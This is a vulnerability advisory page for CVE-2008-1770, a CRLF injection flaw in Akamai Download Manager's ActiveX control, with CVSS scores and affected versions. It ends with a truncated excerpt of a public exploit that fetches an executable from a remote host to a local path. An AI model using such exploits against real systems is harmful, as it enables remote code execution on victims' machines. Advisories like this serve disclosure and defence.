9.3
CVSSv2

CVE-2008-1770

Published: 04/06/2008 Updated: 11/10/2018
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

CRLF injection vulnerability in Akamai Download Manager ActiveX control prior to 2.2.3.6 allows remote malicious users to force the download and execution of arbitrary files via a URL parameter containing an encoded LF followed by a malicious target line.

Vulnerable Product Search on Vulmon Subscribe to Product

akamai download manager 2.2.1.0

akamai download manager

akamai download manager 2.0.4.4

akamai download manager 2.2.0.0

Exploits

<html> <!-- /********************************************************************************** Exploit start here, by cocoruder(frankruder_at_hotmailcom) For "Akamai Download Manager File Download To Arbitrary Location Vulnerability" This exploit will download "rudercdutnet/attach/calcexe" to "C:\\ ...